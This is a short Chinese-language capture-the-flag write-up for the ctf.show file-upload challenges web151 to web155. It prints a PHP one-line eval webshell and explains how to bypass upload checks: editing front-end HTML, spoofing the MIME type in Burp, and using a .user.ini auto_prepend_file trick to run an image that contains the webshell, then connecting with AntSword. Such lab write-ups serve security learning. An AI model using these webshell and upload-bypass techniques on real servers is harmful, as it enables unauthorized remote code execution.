1.web151
前端验证,修改html代码,上传还有一句话木马的php文件,之后用蚁剑连接即可找到flag
<?php eval($_POST[1])?>
2.web152
前端有验证,还是需要修改html代码
burp抓包,修改content-type为image/png
连接蚁剑,得到flag
3.web153
前端有验证,还是需要修改html代码
尝试了以下修改mime并没有绕过,猜测检测了后缀和mime类型
burp抓包,上传.user.ini,此配置文件时nginx服务的配置文件,写入auto_prepend_file=2.jpg,在上传2.jpg,2.jpg中写入一句话,之后把http://d6a3715e-bc9a-4bc2-8e1e-e540b0bbaeaf.challenge.ctf.show/upload/index.php 添加到蚁剑中即可读取flag,访问此链接时会自动包含2.jpg
.user.ini利用需要在此目录下还有php文件,user.ini 上传的文件 原有的php文件需要在同一目录下
.user.ini
auto_prepend_file 表示在文件头包含
auto_append_file 表示在文件尾包含
上传.user.ini
4.web154
通过测试发现,检查mime,后缀和文件内容,里面不能有php
上传.user.ini ,写入auto_prepend_file=2.png ,在上传2.php 写一句话木马 <? eval($_POST[1])?>,在把链接加到蚁剑即可读取flag
上传.user.ini
上传2.png
5.web155
和上题一样,注意这里只能使用png,和上题的区别限制了图片只能是png